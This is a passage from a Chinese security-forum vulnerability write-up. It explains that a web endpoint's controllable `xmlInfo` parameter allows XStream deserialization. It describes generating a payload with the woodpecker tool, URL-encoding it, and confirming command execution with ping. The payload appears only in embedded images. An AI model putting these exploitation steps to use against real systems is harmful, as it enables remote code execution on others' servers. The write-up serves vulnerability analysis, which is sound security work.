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
|
|||
|
|
<p blockindex=72>可以看到<code>validateAndReturnXmlInfo</code>其实是获取请求参数<code>xmlInfo</code>的值,这个我们是可控,构造payload。</p>
|
|||
|
|
<p blockindex=73>这里使用woodpecker插件进行XStream Payload的生成(工具地址:<a href=https://github.com/woodpecker-framework/woodpecker-framework-release%EF%BC%9B%E6%8F%92%E4%BB%B6%E5%9C%B0%E5%9D%80%E2%80%9Chttps://github.com/woodpecker-appstore/xstream-vuldb>https://github.com/woodpecker-framework/woodpecker-framework-release;插件地址“https://github.com/woodpecker-appstore/xstream-vuldb</a>”)</p>
|
|||
|
|
<p blockindex=74><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=75>复制出来去除缩进的空格和换行后将其进行URL全编码,访问接口并传参</p>
|
|||
|
|
<p blockindex=76><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=77>成功执行ping命令</p></div></div>
|
|||
|
|
</div>
|
|||
|
|
<div class="post-opt mt-30">
|
|||
|
|
<ul class="list-inline text-muted">
|
|||
|
|
<li>
|
|||
|
|
<i class="fa fa-clock-o"></i>
|
|||
|
|
发表于 2024-06-28 10:50:20
|
|||
|
|
</li>
|
|||
|
|
<li>阅读 ( 2821 )</li>
|
|||
|
|
<li>分类:<a href=https://forum.butian.net/community/Vul_analysis target=_blank rel="noopenner noreferrer">漏洞分析</a>
|
|||
|
|
</li>
|
|||
|
|
<li><a href=# class=report_btn data-source_type=article data-source_id=3100 data-toggle=modal data-target=#send_report_model><i class="fa fa-flag-o"></i> 举报</a></li>
|
|||
|
|
</ul>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class="text-center mt-30 mb-20">
|
|||
|
|
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=community data-source_id=3100 data-support_num=0> 0 推荐</button>
|
|||
|
|
|
|||
|
|
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=community data-source_id=3100> 收藏</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class="widget-answers mt-15">
|
|||
|
|
<h2 class="h4 post-title">0 条评论</h2>
|
|||
|
|
<div class=comment>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class="widget-comment-form row mb-20">
|
|||
|
|
<form class=col-md-12>
|
|||
|
|
<div class=form-group>
|
|||
|
|
<textarea id=comment-content name=content placeholder=写下你的评论 class=form-control></textarea>
|
|||
|
|
</div>
|
|||
|
|
</form>
|
|||
|
|
<div class="col-md-12 text-right">
|
|||
|
|
|
|||
|
|
<button type=submit data-token=Fo6BQLeS7wzodSciSuLp7UEUHp9wJ5UMSR1gVG3J data-source_id=3100 data-source_type=community class="btn btn-primary btn-sm ml-10 comment-btn">提交评论</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=text-center>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<footer id=footer>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class=text-center>
|
|||
|
|
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
|
|||
|
|
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
|
|||
|
|
<a href=https://forum.butian.net/sitemap>sitemap</a>
|
|||
|
|
</div>
|
|||
|
|
<div class="copyright mt-10">
|
|||
|
|
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</footer>
|
|||
|
|
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
|
|||
|
|
|
|||
|
|
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-3100 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span id=cnzz_stat_icon_1279782571></span>
|
|||
|
|
<div class="geetest_panel geetest_wind" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
|
|||
|
|
* Pico.css v1.5.6 (https://picocss.com)
|
|||
|
|
* Copyright 2019-2022 - Licensed under MIT
|
|||
|
|
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:.5rem;--nav-link-spacing-vertical:.5rem;--nav-link-spacing-horizontal:.5rem;--form-label-font-weight:var(--font-weight);--transition:.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media(min-width:576px){#mount{--font-size:17px}}@media(min-width:768px){#mount{--font-size:18px}}@media(min-width:992px){#mount{--font-size:19px}}@media(min-width:1200px){#mount{--font-size:20px}}@media(min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media(min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media(min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media(min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media(min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media(min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media(min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#f5f7f9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-color);--button-box-sha
|